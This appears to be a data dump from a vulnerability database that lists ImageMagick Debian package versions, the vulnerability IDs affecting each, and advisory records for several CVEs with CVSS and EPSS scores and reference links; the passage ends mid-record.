vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2017-9499

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-w9dc-fbc3-mudv

url VCID-wwam-wq1v-1fec

vulnerability_id VCID-wwam-wq1v-1fec

summary ImageMagick: Memory leak in the WriteOnePNGImage() function

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-11538.json

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-11538.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2017-11538

reference_id

reference_type

scores

value	0.00406
scoring_system	epss
scoring_elements	0.60928
published_at	2026-04-01T12:55:00Z

value	0.00406
scoring_system	epss
scoring_elements	0.61005
published_at	2026-04-02T12:55:00Z

value	0.00406
scoring_system	epss
scoring_elements	0.61034
published_at	2026-04-04T12:55:00Z

value	0.00406
scoring_system	epss
scoring_elements	0.60999
published_at	2026-04-07T12:55:00Z

value	0.00406
scoring_system	epss
scoring_elements	0.61047
published_at	2026-04-08T12:55:00Z

value	0.00406
scoring_system	epss
scoring_elements	0.61064
published_at	2026-04-09T12:55:00Z

value	0.00406
scoring_system	epss
scoring_elements	0.61085
published_at	2026-04-11T12:55:00Z

value	0.00406
scoring_system	epss
scoring_elements	0.61071
published_at	2026-04-12T12:55:00Z

value	0.00406
scoring_system	epss
scoring_elements	0.61051
published_at	2026-04-13T12:55:00Z

value	0.00406
scoring_system	epss
scoring_elements	0.61092
published_at	2026-04-16T12:55:00Z

value	0.00406
scoring_system	epss
scoring_elements	0.61097
published_at	2026-04-18T12:55:00Z

value	0.00406
scoring_system	epss
scoring_elements	0.61081
published_at	2026-04-26T12:55:00Z

value	0.00406
scoring_system	epss
scoring_elements	0.61068
published_at	2026-04-24T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2017-11538

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1474922
reference_id	1474922
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1474922

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2017-11538

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-wwam-wq1v-1fec

url VCID-x9y3-z82n-33d8

vulnerability_id VCID-x9y3-z82n-33d8

summary ImageMagick: use-after-free in TraceBezier function in MagickCore/draw.c

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-17547.json

reference_id

reference_type

scores

value	7.8
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-17547.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2019-17547

reference_id

reference_type

scores

value	0.0048
scoring_system	epss
scoring_elements	0.65007
published_at	2026-04-01T12:55:00Z

value	0.0048
scoring_system	epss
scoring_elements	0.6515
published_at	2026-04-26T12:55:00Z

value	0.0048
scoring_system	epss
scoring_elements	0.65135
published_at	2026-04-18T12:55:00Z

value	0.0048
scoring_system	epss
scoring_elements	0.6512
published_at	2026-04-21T12:55:00Z

value	0.0048
scoring_system	epss
scoring_elements	0.65136
published_at	2026-04-24T12:55:00Z

value	0.0048
scoring_system	epss
scoring_elements	0.65057
published_at	2026-04-02T12:55:00Z

value	0.0048
scoring_system	epss
scoring_elements	0.65084
published_at	2026-04-04T12:55:00Z

value	0.0048
scoring_system	epss
scoring_elements	0.65046
published_at	2026-04-07T12:55:00Z

value	0.0048
scoring_system	epss
scoring_elements	0.65096
published_at	2026-04-08T12:55:00Z

value	0.0048
scoring_system	epss
scoring_elements	0.65109
published_at	2026-04-09T12:55:00Z

value	0.0048
scoring_system	epss
scoring_elements	0.65128
published_at	2026-04-11T12:55:00Z

value	0.0048
scoring_system	epss
scoring_elements	0.65118
published_at	2026-04-12T12:55:00Z

value	0.0048
scoring_system	epss
scoring_elements	0.65089
published_at	2026-04-13T12:55:00Z

value	0.0048
scoring_system	epss
scoring_elements	0.65126
published_at	2026-04-16T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2019-17547

reference_url	https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=16537
reference_id
reference_type
scores
url	https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=16537

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://github.com/ImageMagick/ImageMagick/commit/ecf7c6b288e11e7e7f75387c5e9e93e423b98397
reference_id
reference_type
scores
url	https://github.com/ImageMagick/ImageMagick/commit/ecf7c6b288e11e7e7f75387c5e9e93e423b98397

reference_url	https://github.com/ImageMagick/ImageMagick/compare/7.0.8-51...7.0.8-62
reference_id
reference_type
scores
url	https://github.com/ImageMagick/ImageMagick/compare/7.0.8-51...7.0.8-62

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1767041
reference_id	1767041
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1767041

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick::::::::
reference_id	cpe:2.3:a:imagemagick:imagemagick::::::::
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick::::::::

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2019-17547

reference_id

CVE-2019-17547

reference_type

scores

value	6.8
scoring_system	cvssv2
scoring_elements	AV:N/AC:M/Au:N/C:P/I:P/A:P

value	8.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

url

https://nvd.nist.gov/vuln/detail/CVE-2019-17547

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2019-17547

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-x9y3-z82n-33d8

url VCID-xbsu-ac6g-53fn

vulnerability_id VCID-xbsu-ac6g-53fn

summary

ImageMagick has heap-buffer-overflow via signed integer overflow in WriteUHDRImage when writing UHDR images with large dimensions
`WriteUHDRImage` in `coders/uhdr.c` uses `int` arithmetic to compute the pixel buffer size. When image dimensions are large, the multiplication overflows 32-bit `int`, causing an undersized heap allocation followed by an out-of-bounds write. This can crash the process or potentially lead to an out of bounds heap write.
```
==1575126==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fc382ef3820 at pc 0x5560d31f229f bp 0x7ffe865f9530 sp 0x7ffe865f9520
WRITE of size 8 at 0x7fc382ef3820 thread T0
    #0 0x5560d31f229e in WriteUHDRImage coders/uhdr.c:807
```

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25794.json

reference_id

reference_type

scores

value	8.2
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25794.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-25794

reference_id

reference_type

scores

value	0.00019
scoring_system	epss
scoring_elements	0.05003
published_at	2026-04-26T12:55:00Z

value	0.00019
scoring_system	epss
scoring_elements	0.04961
published_at	2026-04-24T12:55:00Z

value	0.00019
scoring_system	epss
scoring_elements	0.04924
published_at	2026-04-21T12:55:00Z

value	0.00058
scoring_system	epss
scoring_elements	0.18197
published_at	2026-04-02T12:55:00Z

value	0.00058
scoring_system	epss
scoring_elements	0.18251
published_at	2026-04-04T12:55:00Z

value	0.00058
scoring_system	epss
scoring_elements	0.17952
published_at	2026-04-07T12:55:00Z

value	0.00058
scoring_system	epss
scoring_elements	0.18038
published_at	2026-04-08T12:55:00Z

value	0.00058
scoring_system	epss
scoring_elements	0.18098
published_at	2026-04-09T12:55:00Z

value	0.00058
scoring_system	epss
scoring_elements	0.18107
published_at	2026-04-11T12:55:00Z

value	0.00058
scoring_system	epss
scoring_elements	0.18063
published_at	2026-04-12T12:55:00Z

value	0.00058
scoring_system	epss
scoring_elements	0.18013
published_at	2026-04-13T12:55:00Z

value	0.00058
scoring_system	epss
scoring_elements	0.17955
published_at	2026-04-16T12:55:00Z

value	0.00058
scoring_system	epss
scoring_elements	0.17966
published_at	2026-04-18T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-25794

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	8.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3

reference_id

reference_type

scores

value	8.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3

reference_url

https://github.com/ImageMagick/ImageMagick

reference_id

reference_type

scores

value	8.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick

reference_url

https://github.com/ImageMagick/ImageMagick/commit/ffe589df5ff8ce1433daa4ccb0d2a9fadfbe30ed

reference_id

reference_type

scores

value	8.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick/commit/ffe589df5ff8ce1433daa4ccb0d2a9fadfbe30ed

reference_url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-vhqj-f5cj-9x8h

reference_id

reference_type

scores

value	8.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T15:04:46Z/

url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-vhqj-f5cj-9x8h

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-25794

reference_id

reference_type

scores

value	8.2
scoring_system	cvssv3.1
